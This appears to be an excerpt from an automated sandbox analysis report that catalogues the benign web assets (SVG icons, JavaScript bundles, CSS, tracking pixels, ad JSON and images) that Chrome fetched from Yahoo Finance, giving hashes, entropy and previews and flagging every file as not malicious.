                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):149
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.106668500556004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHjVYuIfepp5bZIAdSbFS:H69mc4sl3O4jVJCepvNb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AE5FFB8B9F718200BEECE321B27C2494
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DF8746A5480120C715B1049C742DA6C7E1A7EEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:78D7CC5AC35882275B042C947BFFCF418BE0D5AA717E450C1DED37AE5E2B6DBF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A1ABD5E5FB5C6FD40E50F390D28B67DF3A1F284A8174436D8B7A13158FD35122EE0D8272867C1C288C54FC67B78B60D91EB334CA0D34F61B3A586B218F540AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M16.59 8.59 12 13.17 7.41 8.59 6 10l6 6 6-6z"/></svg>';export{s as C};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.990791462240958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:2dVZZL8NdTv3lYAjeaxMcRcTX+TLRjUhZ88TzlSV29nLiFyGAhIhxCAOFTsWwK3p:c7R8NdTvVY6OST8883029nlhcmTNL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D216D3B4E5A67F022FA3EF4E71781439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5E6B829187DCD592B6C4F4998F513B6B77FC9D18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:54352CC37FAFE590444BC57BE54170A6CCB8A8EEB30A618911995780FAA8462E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5878820FE8632627043FD2FDCBB65F3CB614B06A786DBF719A80165187A804D5D23A74BD8E312073ED292C07DCA4D42A39D346D35D9C0B49362AA036D9E7B413
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/finance/favicon_y19_32x32_custom.svg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="32px" height="32px" viewBox="0 0 32 32" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 57.1 (83088) - https://sketch.com -->. <title>favicon_y19_32x32_custom</title>. <desc>Created with Sketch.</desc>. <defs>. <polygon id="path-1" points="0.171073913 0.0931111111 9.4455087 0.0931111111 9.4455087 9.92442222 0.171073913 9.92442222"></polygon>. </defs>. <g id="favicon_y19_32x32_custom" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <rect fill="#6001D2" x="0" y="0" width="32" height="32"></rect>. <g id="y!" transform="translate(5.000000, 6.000000)">. <polygon id="Fill-1" fill="#FFFFFF" points="9.70835927 5 7.04604411 11.4197051 4.40657437 5 0 5 4.91176421 16.0265583 3.14442407 20 7.45914574 20 14 5"></polygon>. <g id="!" transform="translate(12.000000, 0.000000)">. <path d="M2.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7792)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7886
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.429951414625623
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:IPqBIfZU24PdWzoPcIOs9giUteOBVmuIyaUzORSHbq6m:IPqBIfe2sgiTOBVmf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B480205812C6F7081BE3C4B3DCDC2C38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A0EC4B4224F79B9E9F39035B923B98E7FE2FB87F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A0630DAB9F9F9DA57CD46F5F8D6AB66BCB74423930C37F1A6E581C27A2430E2A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:54DA3036BF5A9E6081074FC55AD2136D0BBF3B25FF984FB2CD303F0F5076CA61E5922B1FB4D210F42121B4BA275C6BACCA2790E4869172ECAD546520C2A286FF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-92b2eb23.9d08b3bcad291443bfab.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[7508],{2438:(e,t,i)=>{i.d(t,{BC:()=>c,FK:()=>a,Mb:()=>s,NL:()=>b,Ou:()=>m,R4:()=>S,Rz:()=>v,Wm:()=>r,bS:()=>h,bg:()=>w,kn:()=>l,lF:()=>p,po:()=>g,qm:()=>Q,qx:()=>n,sg:()=>f,vN:()=>u,zN:()=>E});var o=i(8287);const n="qspvitre_wddhddl5q00",r="Visitor Trend",s="https://s.yimg.com/cv/apiv2/finance/yfinance-plus.svg",a="https://s.yimg.com/cv/apiv2/finance/yfinance-plus-d.svg",l="Subscribe to Yahoo Finance Plus to view this content",u="Upgrade to begin using premium community insights",c="https://www.yahoo.com/plus/finance?ncid=qspchartco_e9d95xv3zde",d={communityInsights:100001220,technicalEvents:100001127,corporateEvents:100001126};function m(e){var t;const i=new URL(null===(t=window.location)||void 0===t?void 0:t.pathname,"https://finance.yahoo.com");i.hash="";return`https://finance.yahoo.com/abo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):17393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.01606130085875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:ojq4O/A4xkBDQitfF0gHdwhTpVMIxqq0AkDfDtHx17NAESwWCerMCEhnm:mb4xkpQitfumKvV70AkjlkCe7knm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2D2A502CBF638FE9E7AA1C1623C7C9E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4D4337A8B8770F4CCC81D19C6CD1141F5706A08C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4DAA989789DFCC3EF4FA38A9F74B1F938A43CB1F62E34DD538E72876DD7F34BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BF176D0FABCF9F485FD116AF2E8827CD2C628B043AE5D925B680ABF54C81296DF0C13FA4E3352E9E9BCF7E91A8714F95BCE79F344FB3A6F31501E380703DC1A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"sodar_query_id":"X976Zqj8M5aWjuwP_f_KKQ","injector_basename":"sodar2","bg_hash_basename":"gV8oOBGKSZbVoBuTsHuy49HjUHUKsGGS79HUBzhlvTM","bg_binary":"fGlBRD7kYFskvj614haWOehqnGGjXP3YlImwsVuNICYmrXZFY/74Kmqqbjmk907ni5HLVS/Ip/UPPp3hUSgvdduo2/GgH6JS8mIjPm+k4z0tGtPtrf97ifRefE0BNzpNSCWtA0xLDk6EZdJCgir9cS2KAS9evepCRNf5n8m4wPIeqAjHw7iIIPW91XDVOZOwIkFX9hlbjzZL8zVDd2SBzQfsErmK6gz295Vs2RMwUBXiZtc2BSjyuNN+mY3PHf2b1PBrW6pqM2jgyLKxaIVqp1WUOxsilNNcuSwdLpP453HPPHS3TcTP+2BG/EhNDEVSaj6QgoDyE5BQgGpbig5WtKfS788oVfaL5fZjAagCqJ6BETW/VYZzvvmgltW5CPZVIL4CkPtdN73KDXRtumcVWlPrxvu4Hmo+YMrbXaQO29/NYICuFgpraekCpBjtA8r/kCDK1OrUrSKDOrT31fToaCpzxLf0q+h/3UGSC4CI70kMsnO+XnbyowvmsC/++s/knvwgT80dzj9879R2zDD43nKz0q0/cFD1NxxVwkwIUwaCfIRVxySg5ks6zg+SyTK1+Bw+FD605MKsr76JAbgYtX7MBxImEu4ejTOQi5m699TfWxg+sNf2piRWtm/YsM9N312Rcuuf0T3RISk06kR0os2Q1TpP86WBGUb9lzAvhObfeX7ftn6T8XgAfT5/hfCamuDnGMW0albY2pEOY2kTTh4+P3abSM0qVTzFxKZ3VgjsmPOCwoWsvYbY1jX1vC7rYq3hsASM/Bh9LdhM4NOKHMAn0O4tRq5bUlXXX+7ONYr0ySm5VPL2orPEj+Dqf/zZ9dBdHpkOUwUymVQsZF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):33466
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.842531942412964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:x9JDhDZ358Io2xKN0RxKwrDqbh3f0megR7hqTvAPO84sKIoyAbS:BFx+urAr+bS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4D6AE2198AEA521E66B04ADF7EB3510D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C2940D6DAB96162D057BC15E34317524FF92B789
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:AC90D07059504E36663080C4E13D7215AB7F6489EC38CF0AB8188FEE2F537CB6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:64D27E6808A1B99D3A93033C1257467794B0D99165D414ACFD9B90565497C9447133915B78A96BA8E303E3BD59E2BE7FE02C4786B746288998325F54A3CB9B03
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"/22888152279/us/yfin/ros/dt/us_yfin_ros_dt_top_center":["html",1,null,null,1,1,1,0,0,null,null,1,1,[["ID=fb7bd678a371612e:T=1727716928:RT=1727716928:S=ALNI_MarXCBDDlsY8oHAGjMM-WikbCon4w",1761412928,"/","yahoo.com",1],["UID=00000efef84f3d2b:T=1727716928:RT=1727716928:S=ALNI_Mbj-r7hqIL8QgJgn17ppeWm6HBKVg",1761412928,"/","yahoo.com",2]],[138467550610],[6637103456],[5462617191],[3473844160],null,null,null,null,null,null,null,1,null,null,null,null,null,null,"AOrYGsmciwo8_9XFFNOReZHKOoPpkV2UthE7TkhZ3cNQ25X27w2PIobpC3WlGUZCpqcv1BVP-0VMcj5O8zRQqUQKObxvlUYVfYZHiuj1ugJ-W3u4rO-A","CMO7mI6X64gDFVu4_QcdHtEFiA",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,"AA-V4qMeIGifBXGLEOtwlLf8mwK69AocUcko-opiQMJsgafb2Wt-JXk8KN-ZWK5MIpwnSmKIgfs2gDEgIw3wXpZvuif1SAb0-12AGdsc55R_ibrMISSX",null,null,1,null,null,null,[["ID=29afa28d447da69f:T=1727716928:RT=1727716928:S=AA-AfjZUyWco6ZIUolURg_qRHGC5",1743268928,"/","yahoo.com"]],[]]}.<!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2143)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.033432477803486
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1RLr+S60tCVgSNseuD7INpN7vb4Vnhe5O7hHUVYvDR6w/e5lnX35E4:1mgSEMn6nh7hHEYvDR6w/Kn5E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DB64B85EBFF1876947C8A4697EC7947D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2162129F295D7497DB7CD3A0A2FEDD90ACE4C0AA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:31BDB3EA12204F79E03970C773EEF86EF264AE9579EA2553F332513D39F55AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:10EF032AF957B073FDA45EBFBD3112A8CC6E689900A118B3F6D437E43B8E38BDDF5148C53C47D7B41720C510CFDF19745C020618353961B3758AB821E28024CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/LargestCompaniesIn.Ch0GKn0a.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.container.yf-1ivtmk2.yf-1ivtmk2{display:grid;grid-template-columns:1fr;grid-template-rows:1fr}.range.yf-1ivtmk2.yf-1ivtmk2{display:grid;grid-column:1/span 2;grid-row:3}.controls.yf-1ivtmk2.yf-1ivtmk2{grid-column:2;grid-row:1}.chart.yf-1ivtmk2.yf-1ivtmk2{grid-column:1/3;grid-row:2}.labels.yf-1ivtmk2.yf-1ivtmk2{display:flex;grid-column:1/span 2;grid-row:1;font-size:var(--font-size-m);font-weight:var(--font-bold);gap:var(--space-4)}.labels.yf-1ivtmk2>span.yf-1ivtmk2{display:flex;align-items:center;gap:var(--space-1)}.labels.yf-1ivtmk2>span .sym.yf-1ivtmk2{font-weight:var(--font-normal);color:var(--text2)}.labels.yf-1ivtmk2>span .orb.yf-1ivtmk2{display:inline-block;width:var(--space-3);height:var(--space-3);border-radius:50%}.labels.yf-1ivtmk2 .curr .orb.yf-1ivtmk2{background-color:var(--categorical1)}.labels.yf-1ivtmk2 .comp .orb.yf-1ivtmk2{background-color:var(--categorical2)}.sym.yf-1ivtmk2.yf-1ivtmk2{display:none}@media only screen and (min-width: 768px){.sym.yf-1ivtmk2.yf-1ivtmk2{dis
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cm.g.doubleclick.net/pixel?google_nid=rubicon&google_hm=MjdiYjVjZmVmNmQ1ZGZjOTIzMzJkZTVkZmJiNDM2YjE2MjBiMzBiYg&gdpr=0&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16798), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):16798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.223409253489215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3+Ec6BG/PFvVHWahu22YXGjDmgTkgcpUh1HswyjIkr8EAe:OD+ipVHWa1c/TIUYjINe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F085D6C42ACB1394E457E463230DE8BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DEACA09E50FB2D08C90F07CC588A8B1B4C191732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F2C2013A67C8DD205E93EF40CF60DA7B3BB48A075E7B649FDE2B2F646B15896F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:029FDDCBD993E68E25B470D316CC94EF513AC536AB70C39F5B6920B6BEF6398F3BF77DD5F6067441337068566F1DCF408CDEC28DC22E03256E634AF644322875
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-fetch",[],t):"object"==typeof exports?exports["wafer-fetch"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-fetch"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){var r={};for(var n in e)t.indexOf(n)>=0||Object.prototype.hasOwnProperty.call(e,n)&&(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (63659)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):101962
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.260395010789332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:s7cBfQ7YvwTWoAy3I2Mq2S0pH/rqGIk0oL0y1GjKeXlBEYkF/UGdp7SxbOintxHG:HxpH/rqboLlGWtx8lXK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B6BD4DC883BAF9005286FCF60AA6E68A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:88BAC358912B0334DA75149D179BA3AE1C2732A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF0B4180476F635617EAC65EC538ACA10C836D87F9B4B0853210FCF958EFD11F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EB52EB1103079A20EAC9863ABBBAD0B941B73B3EE1C61981A4D22AEE2F82FFF4774E2BB236AD32B9DF3663FEE0A0A421E35BB04C5F1709FA4DE26F6E6082DC86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/spotim/launchers/sp_Rba9aFpG_spot.v2024.07.19.03.23.0.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(function(){window.__OW_CONFIG__={"ab_test_config":[{"short_name":"100","version":"v2"},{"short_name":"101","version":"v2"},{"short_name":"32","version":"v1"},{"short_name":"33","version":"v2"},{"short_name":"34","version":"v2"},{"short_name":"35","version":"v1"},{"short_name":"37","version":"v1"},{"short_name":"46","version":"v2"},{"short_name":"47","version":"v1"},{"short_name":"48","version":"v1"},{"short_name":"51","version":"v1"},{"short_name":"55","version":"v1"},{"short_name":"56","version":"v1"},{"short_name":"600","version":"v1"},{"short_name":"601","version":"v2"},{"short_name":"602","version":"v1"},{"short_name":"67","version":"v2"},{"short_name":"751","version":"v1"},{"short_name":"752","version":"v1"},{"short_name":"754","version":"v2"},{"short_name":"758","version":"v33"},{"short_name":"759","version":"v11"},{"short_name":"761","version":"v8"},{"short_name":"764","version":"v1"},{"short_name":"767","version":"v1"},{"short_name":"773","version":"v1"},{"short_name":"776","v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, progressive, precision 8, 300x250, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):35933
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9459823662148015
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:4YyH2X9YOBe5IcZ5vUk1O8S1OcTRFNJ8e/I2mEeIZieB:4Dk9I53/U9qQ73nPHeoB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:90AF20F9182B77F23627419FB4C51FEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DEDC1306A272C4E3B67702F6F0F146A9FED400E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:11B950B09F3A0B374C2B889EFB424071CFF3C6B17E7BB26FDB3FDB8014D21C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:848FAA696DE805E84C4BC75C5B550FC999E0D174C25E71DA188F63DDC4EDB453CBB89DF144061A17741FA9808CFCEC3094408AB8A8B10800AA199B80A2231D05
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/default/20181213/Finance_Brand_Filler__300x250_Look_1.jpg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (305)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):306
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.949111560169397
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:1RzDkAfMEXKRDwBOhTRgR/V59uV3Ox00ldzUARMMp:1RvkAkEalwBOJRgOV3O6yUARMo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:760F50663F2FCE6756C70F3ACB09BEBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:123A49FA085D0C4A9194B20B128DAF632DFF8719
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:ABB683C6985EAB0E41727E636B9D869DD78EAF84FD113FDFDCCF39314466EE52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:457102CC2F3223E92975CD1199C3B229088ACE06E52B12453CE454F84276FC9DE2DD802C9219D886EDB0B1856F6367466327F022217C79ECF399126967668D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/SectionWithSidebar.Bf-AwOOu.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.container.yf-hvsrhi{container-type:inline-size}.column-container.yf-hvsrhi{display:flex;width:100%;gap:var(--space-8) var(--layout-gutter);min-height:20rem;margin-bottom:var(--space-8)}.column.yf-hvsrhi{flex:1}.sidebar.yf-hvsrhi{width:300px}@container (max-width: 982px){.sidebar.yf-hvsrhi{display:none}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5471)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.423607428807685
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:cmQuF96cISR9kocIkjJdMcER+krEoN62zIECM9nsJ6oaPY/QwGYPyM0NYLGpWkZP:coFs4HkldkGoxkECMuJ6CGYaM08GYkZP
